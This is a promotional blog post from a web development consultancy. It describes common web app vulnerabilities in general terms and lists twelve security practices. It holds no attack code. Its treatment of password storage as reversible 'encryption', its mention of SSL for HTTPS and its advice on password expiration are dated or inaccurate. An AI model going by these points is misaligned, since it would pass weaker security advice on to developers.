Top 12 Practices to Develop & Secure a Web App

As more companies switch to work-from-home culture, the use of cloud-based web apps has skyrocketed! More businesses are moving towards converting their enterprise systems into web apps due to their benefits!

For starters, a web app doesn’t require any downloading or installation as it can be accessed from any internet-enabled device. As a result, it boosts productivity and helps companies save valuable resources!

However, this rise in the use of web applications has also led to a rise in cybersecurity issues! Almost 50% of the data breaches can be traced back to web apps. According to another report, 98% of web applications are prone to cybercriminal attacks.

And in 2022, the average cost of a data breach was $4.35 million… That’s an increase of 2.6% from the previous year. And the number is just expected to increase in the upcoming years.

All of these stats tell us that vulnerabilities are widespread in web apps, and something must be done to rectify that! That’s why today, we will look at how to secure a web app & refer to some common vulnerabilities found in web apps.

Common vulnerabilities of web apps

Vulnerabilities in web applications allow malicious actors to gain unauthorized access, change source code, steal confidential data, or interfere with the application’s operations.

That’s why patching these vulnerabilities should be a top priority, as it poses a serious threat to data security & can even cause financial loss.

Let’s look at some common vulnerabilities of web apps:

Cross-site scripting (XSS)

This is an attack in which the application’s users are the target. With an XSS attack, malicious actors can inject trojans, access user accounts, or change page content.

There are two variants of XSS, known as the stored XSS and reflected XSS. In stored XSS, the malicious code is continuously added to the application. While in reflected XSS, the malicious code is reflected in the user’s browser via the web app.

SQL Injection

In this type of attack, malicious SQL code is injected into the web app’s database. This can enable malicious actors to have unauthorized access to the database where all the sensitive data is stored.

As a result, the malicious actor can then access, delete, or even add new data.

Cross-site request forgery (CSRF)

With a CSRF attack, an attacker can achieve data theft, funds transfer, or even change a user’s password. In a typical CSRF attack, the malicious actor takes advantage of a user’s open session to perform actions without the user’s knowledge.

This enables the attacker to do everything that can be done through the user’s account, such as changing email, changing password, funds transfer, and so on.

Remote file inclusion (RFI)

RFI attack is used to inject malicious code into the web application’s server. And once the malicious script makes it into the application, it can then be used for data theft or compromise the whole web server.

So, how to secure a web app against IRF!? Well, adopting practices of writing secure code and sanitizing the inputs/outputs can help secure web applications. However, just adopting the best practices is just one part of developing protected web applications.

A more comprehensive approach would involve conducting security testing during every stage of the development process. This will increase the chances of identifying any vulnerability in the code and then fixing it timely.

Usually, it is the use of 3rd party components that can invite vulnerability in web applications. So, while it is crucial to scan the local code, it is also essential to examine the 3rd party components on a regular basis!

12 best practices for securing a web app

We’re back to the central question: how to secure a web app? I’ve prepared a list of 12 best practices to safeguard your web application against attacks; check them out:

1. Require input validation

Sometimes it pays to be paranoid, and requiring input validation is one of those payoffs… By default, you should consider all types of input as hostile unless proven otherwise.

In case you don’t know, input validation is a technique that ensures that only suitable and acceptable data make its way into your web application. This can effectively stop malicious actors from trying to process corrupted or insufficient data into the web app.

When we talk about input validation, it means validating data type, format, and even value. Let’s take a quick look at each of them:

• Data type validation – The parameters are checked to ensure the data is of the correct type, such as text, numeric, alphanumeric, etc.)
• Data value validation – The parameters are checked to ensure that they are within the acceptable length or range. For example, you can limit the characters entered in the email box to 1000 characters.
• Data format validation – In this type of input validation, only the acceptable data format is accepted, such as XML, JSON, etc.

Another thing to remember is to follow a syntactical and semantic approach for validating the inputs. In the syntactic validation, only the correct syntax is accepted. And in semantic validation, the correctness of the value is checked (For example, the end date should be greater than the starting date.)

Basically, as long as you follow these input validation techniques, you will already be ahead of most web apps in terms of security.

2. Use data encryption

For example, let’s say that a user has set a password, “ILoveCanadianDigitalConsulting” for their account. So, instead of saving the password in plain text format in the database, the data will be encrypted and stored as “KdOHlsHMR1GuCVR0CnMunEtMqZxTkhsHN6FVHDJZB3I=”.

As you can see, the encrypted password will no longer make sense even if someone gets unauthorized access to it!

To get the most out of data encryption, it is best to use it whenever data is transmitted in and out of web applications. In fact, even the different entities of your app should communicate with each other with proper encryption in place!

3. Check security configurations

These days, a typical web server management software can provide a lot of options to secure a web app. However, the availability of so many options means more chances of messing things up!

Therefore, from setting up a new website to the web server, everything must be considered from a security point of view!

Documenting the whole process of setting up websites & servers is the most practical way to prevent security misconfiguration.

Some of the typical reasons that can lead to a security misconfiguration are given below:

• Unprotected file paths and directories
• Not deleting the guest or default accounts from the server
• Expired digital certificates
• Not updating the security protocols according to the latest standards
• Unused open ports on the server
• Using old software libraries

Misconfigured server and website settings are a common reason why most web apps get security breaches! So, it is high time for you to go over these settings before moving on to more complex measures.

4. Use HTTPS (Hypertext Transfer Protocol Secure)

Another way to amp up the security of a web application is to use HTTPS instead of HTTP.

HTTPS uses SSL (secure socket layer) to create an encrypted connection between the user’s browser and the web app. This means all the data between the user’s browser and the application’s server remain encrypted and private.

Today, around 81.9% of websites use HTTPS as their default protocol. The technology is even more common among online marketplaces and e-commerce sites as they require online transactions.

Additionally, any third-party components that are a part of the web application should also be referenced using HTTPS.

Sometimes, linking to external resources such as JavaScript, CSS stylesheets, and other files over the HTTP may end up presenting potential security issues & make your app less secure.

5. Use authentication and access control

Implementing account management practices such as multi factor authentication, strong password enforcement, and a secure password recovery mechanism is also at the heart of building a secure web application.

Similarly, you can introduce re-authentication when the users access sensitive features such as changing passwords, email, or accessing personal information.

By default, a web application should provide only the minimum required privileges to the users. For example, users wouldn’t need to change their email or password every other day. So, when a user tries to change their email or password, you can re-authenticate the user.

Some other ways to enforce authentication and access control are to use password expiration, email confirmations, and account lock-outs on an extended period of inactivity.

6. Utilize exception management

The next best practice on our list of how to secure a web app is exception management.

Exception management refers to a practice where only a generic message should be displayed whenever failure happens in a web app.

Including detailed system messages in case of a failure wouldn’t do any good to the end user. In fact, it would provide clues to the malicious actors looking to break through your web app’s security.

A web application following good security practices should have three outcomes:

1. Allow
2. Reject
3. Handle

For example, it would be wise to display a friendly message to the user if a web application fails. But if it displays information that XYZ’s third-party component of web apps is not working, it wouldn’t do any good to the end user. However, it will provide unnecessary information to the threatening entities.

7. Audit and logging

Auditing and logging are yet another best practice that can help you to secure a web application. Thankfully, most web servers automatically log all activities and can be viewed by looking inside the server management software.

However, just because the web server logs information doesn’t mean your job is already done… To be ahead of unethical hackers, you must establish a routine of auditing the log files to notice any suspicious activities.

For instance, let’s assume you found that a bot from Place-X is trying to access different sub-directories on your web application. By looking at logs, you can find the user agent, IP, and other relevant information about the bot. This information can then be used to block the bot from the server management blocklist.

Similarly, the log files also include application errors that might not be noticeable at first glance. So, another benefit of audit logging is that you can notice and rectify application errors!

And last but not least, the logs of your web application can also play a key role in legal proceedings. In the case of a VPN application, it is not uncommon for companies to share the logs with relevant authorities.

8. Rigorous container management

These days, it is not uncommon for web applications to utilize containers with the help of Docker. Although it helps in scalability and quick deployment, it can also lead to security issues without proper management.

To ensure that you follow the correct security measures for containers, follow these tips:

• Secrets – You shouldn’t save any sensitive information in a container image. The reason behind it is that information will then become available on any further containers that are made from that image. The best way to store information is to use Docker’s secrets mechanism.
• Root Access – At the time, it may sound like a good idea to grant root access to every container. But in the case of an attack, it would compromise the whole system instead of a specific container. That’s why it is best to define user access in your images.
• Trusted Images – Make it a habit to only use images that are properly scanned for vulnerabilities and come from a trusted source. De facto, it is best to even scan your own images before using them for creating a container!
• Network Segmentation – With this mechanism, you can ensure that a container’s access to other systems is only allowed when it is absolutely required. Similarly, only allow the containers to run in their protected subnets unless it is a requirement.

9. Quality assurance (QA) and testing

It is common to perform in-house testing and quality assurance (QA) of web applications. However, that’s usually not enough to uncover every security loophole.

That’s why another way to assure the optimal security of a web application is to hire a 3rd party for vulnerability scanning and penetration testing.

Sometimes, it can be difficult for developers to uncover bugs or security loopholes in their code. But a fresh pair of eyes with sufficient experience in testing and QA can oftentimes find security loopholes that were missed.

As for in-house testing, it is best to create a well-documented process that can be easily repeated. This would allow the testing & QA team to test the web application against all the agenda items listed in the testing process.

10. DDOS protection

Distributed denial of service (DDOS) attacks are a common cause of service disruptions. In a typical DDOS attack, bots send a huge amount of traffic to the web app in a short period of time. This much bot traffic can overload the servers and thus lead to service disruption.

A prolonged service disruption eventually leads to financial loss and even makes the customers move away to a competitor.

For a small business, a DDOS can cause damage of $120,000. And for large corporations, the cost arising can be up to $2 million. Additionally, 16 DDOS attacks happen every minute on average!

So, there’s no doubt that a DDOS attack presents a severe threat to the security of a web application. That’s why another way to secure your web app is to use a DDOS protection service.

Some of the good DDOS protection services include CloudFlare, Radware, and Imerva. Besides offering DDOS protection, most of them also provide CDN services. The latter can even enhance the performance of your web application.

11. Use secure SDLC management

Secure software development life cycle (SSDLC) is a framework that puts emphasis on developing code from a security point of view.

So, while you take measures to protect your web app once it is developed, you can also follow measures such as the SSDLC to ensure security during the development phase.

Some of the critical points of secure SDLC management include:

• Development & maintenance of the web app from adequately trained employees.
• A safe environment for building the app.
• Secure delivery of the app to the end user.
• Providing security training to the developers.
• Securing any third-party libraries and open-source code in the app.

12. Automate security tasks

Using the manual approach for more complex security issues is considered to be okay. But with simple tasks, it is usually best to adopt automation as it will save valuable teams. In addition, it would help your team to focus on other security tasks that can’t be automated.

If you think about it, it will take a lot of time to fix even the simple vulnerabilities. After all, new vulnerabilities are discovered every other day, and it doesn’t make sense to do everything manually. So, we recommend you take full advantage of automating any automatable security task or measure.

To automate security tasks, there are several tools available such as SAST, Snyk Code, and Sny’s SAST solution.

To sum it all up

There’s no way around taking a proactive approach to keep your web app secure from malicious attacks. We have listed 12 best practices that can help you to keep your web application safe and well-protected.

But you can only do so much by running various tools and following best practices… If the code of your application is not built with security in mind, it becomes an uphill battle to keep it safe and secure.

That’s why it is always best to hire a professional development team that can help you to build a secure web app from the ground up!

At Canadian Digital Consulting, we remain at the forefront of cybersecurity & know what it takes to build a secure web app! So if you have an idea about a great web app, hit us today to get things started!